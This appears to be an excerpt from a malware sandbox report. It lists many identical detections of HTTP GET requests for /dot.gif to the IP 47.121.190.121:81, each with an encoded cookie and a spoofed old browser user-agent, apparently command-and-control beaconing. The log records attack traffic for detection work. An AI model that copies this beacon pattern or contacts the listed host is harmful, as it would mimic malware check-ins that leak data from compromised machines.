            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dot.gif HTTP/1.1Accept: */*Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
